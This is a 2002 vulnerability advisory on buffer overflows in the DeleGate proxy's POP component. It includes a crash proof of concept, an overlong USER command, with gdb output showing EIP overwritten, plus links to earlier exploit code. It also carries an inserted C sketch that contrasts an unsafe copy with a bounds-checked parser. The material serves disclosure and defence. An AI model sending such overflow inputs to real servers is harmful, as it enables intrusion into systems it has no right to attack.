--------------------------------------------------------------------------
Global InterSec LLC
http://www.globalintersec.com
--------------------------------------------------------------------------

GIS Advisory ID: 2002012101
Changed: 07/02/2002
Author: research@globalintersec.com
Reference: http://www.globalintersec.com/adv/delegate-2002012101.txt

--------------------------------------------------------------------------

Summary:

DeleGate, a popular application layer proxy, contains a number of remotely exploitable buffer overflows.

Impact:

A remote attacker may execute arbitrary commands.

Versions:

All versions up to and including the current release.

Description:

DeleGate is made up of several components that together proxy various services, including POP, HTTP and HTTPS. Global InterSec found a number of vulnerabilities in the various proxy components, all of which could lead to remote command execution and privilege escalation.

DeleGate has quite a history of problems (see the Credit section) and potentially many more vulnerabilities than are described in this advisory. The author has addressed many of the previous problems by attempting to randomise the stack area. However, as we show below, this work-around is no substitute for rewriting the vulnerable areas of code.

Less serious vulnerabilities also exist in DeleGate, including real path disclosure within chrooted FTP environments and cross-site scripting in DeleGate's HTTP(S) proxy code.

Due to the sheer number of exploitable vulnerabilities we found, we have opted to release a single advisory that exemplifies one of the issues.

Scope for attack:

Proxies are often placed on networks to protect sensitive systems and networks from exposure to public networks. To this end, systems running proxies are often in privileged parts of networks, where they are able to proxy services on more sensitive systems, whether in a DMZ or otherwise.

In the case of the POP proxy overflow, exploitation requires no authentication; the only constraint may be TCP wrapping of that service. Successful exploitation of the buffer overflows within the POP proxy code would allow commands to be executed as the user of the daemon process. By default this is nobody, but DeleGate can be configured to run as any user.

Work around:

If DeleGate is critical to your network's operation, we suggest the use of TCP wrappers as a TEMPORARY solution until an alternative is found. For FTP/HTTP/HTTPS we suggest the use of squid.
URL: http://www.squid-cache.org/

tcpproxy is also available; however, it is not an application gateway level proxy and simply forwards TCP connections.
URL: http://www.quietsche-entchen.de/software/tcpproxy.html

Credit:

Vulnerabilities detailed in this advisory were discovered by Tom Parker (Global InterSec LLC).

Previous vulnerabilities in DeleGate:
http://www.synnergy.net/downloads/exploits/delegate.c
http://www.securiteam.com/exploits/3W5Q2RFQ0E.html

The existence of an exploit for the current release of DeleGate is rumoured.

Vendor Status:

None as yet. It seems the author's answer to most of the problems previously found in DeleGate has been work-arounds such as his stack randomisation functions, so don't hold your breath for an official patch. Global InterSec *are* working on a diff file to solve some of the problems; however, due to the sheer number of them it won't be available immediately. When available it will be linked to from the URL at the top of this advisory.

Exploits (Proof of concept):

As described above, the proof of concept below concerns DeleGate's function as a POP proxy. The SIGSEGV shown below occurs due to the use of a globally declared array size, i.e.:

pop.c:28:#define LNSIZE 1024

This is used to set the sizes of a number of arrays, including those holding the username and password.
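The root cause here is a fixed LNSIZE array that an unchecked copy of the USER argument overruns. As an added example (not DeleGate's own code: the advisory does not reproduce pop.c's parsing, so the unsafe function is a constructed sketch of the pattern described), the C below contrasts that pattern with a bounds-checked parse of the POP3 USER line and replays the roughly 1024-byte input the proof of concept sends against the hardened version.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Fixed line size quoted by the advisory (pop.c: #define LNSIZE 1024). */
#define LNSIZE 1024

/* Constructed sketch of the unsafe pattern the advisory describes: the
 * argument of a USER command is strcpy()'d into a LNSIZE array with no
 * length check, so a longer argument runs past the array. Shown for
 * contrast only and never called with an argument of LNSIZE or more. */
void copy_user_unsafe(char user[LNSIZE], const char *arg)
{
    strcpy(user, arg);   /* no bound: this is the overflow behind the SIGSEGV */
}

/* Hardened form: parse "USER <name>" from one POP3 command line.
 * Rejects a missing, empty or too-long name instead of copying it, and
 * always leaves user[] NUL-terminated. Returns 1 if accepted, else 0. */
int parse_pop_user(const char *line, char user[LNSIZE])
{
    size_t len;
    user[0] = '\0';
    if (strncasecmp(line, "USER ", 5) != 0)   /* POP3 verbs are case-insensitive */
        return 0;
    line += 5;
    len = strcspn(line, "\r\n");             /* name length up to the CRLF */
    if (len == 0 || len >= LNSIZE)           /* would not fit with its NUL */
        return 0;
    memcpy(user, line, len);
    user[len] = '\0';
    return 1;
}

/* 1 if line is accepted and the parsed name equals want, else 0. */
int user_parses_to(const char *line, const char *want)
{
    char user[LNSIZE];
    return parse_pop_user(line, user) == 1 && strcmp(user, want) == 0;
}

/* Replays the advisory's input ("USER " followed by ~1024 'A's, constructed
 * here) against the hardened parser; returns 1 if it is rejected cleanly. */
int overlong_user_rejected(void)
{
    char line[LNSIZE + 64], user[LNSIZE];
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', sizeof line - 8);       /* 1080 'A's, > LNSIZE */
    memcpy(line + sizeof line - 3, "\r\n", 3);    /* CRLF plus NUL */
    return parse_pop_user(line, user) == 0 && user[0] == '\0';
}
```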
As with many of the vulnerabilities in DeleGate, a SIGSEGV occurs when attempting to strcpy() unexpectedly long strings. In spite of the attempts DeleGate makes to randomise the stack, we were successful in overwriting the extended instruction pointer (EIP). Although the stack randomisation functions make things harder, they do not make arbitrary command execution impossible.

Attacking target `xxx.xxxx.xxx.xxx`:

: +OK Proxy-POP server (DeleGate/7.7.1 by ysato@delegate.org) at xxx.xxx.xxx.xxx starting.
Sleeping for 20 seconds, attach gdb ;-)

root@foo:/home/foo/delegate7.7.1/src > ps -ax | grep DeleGate
30215 ?        S      0:00 DeleGate -{016+00:foo.bar.com}[pop://-/]-Pxxx.xxx.xxx.xxx:110 --

root@foo:/home/foo/delegate7.7.1/src > gdb delegated
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) at 30215
Attaching to program: /home/foo/delegate7.7.1/src/delegated, Pid 30179
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_compat.so.2...done.
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /lib/libnss_dns.so.2...done.
Loaded symbols for /lib/libnss_dns.so.2
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
0x40101167 in poll () from /lib/libc.so.6

-> USER AAAAAAAAAAAA<~1024 Bytes>

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) print $eip
$1 = (void *) 0x41414141
(gdb)

In the case of a *real* exploit, the EIP could be a pointer to the attacker's shellcode, which would already be in memory.

Exploit:

Yea right ;-)

Legal:

This advisory is the intellectual property of Global InterSec LLC but may be freely distributed on the conditions that:

a) no fee is charged;
b) appropriate credit is given;
c) distribution of the advisory does not break NDAs issued by GIS.

Global InterSec LLC 2002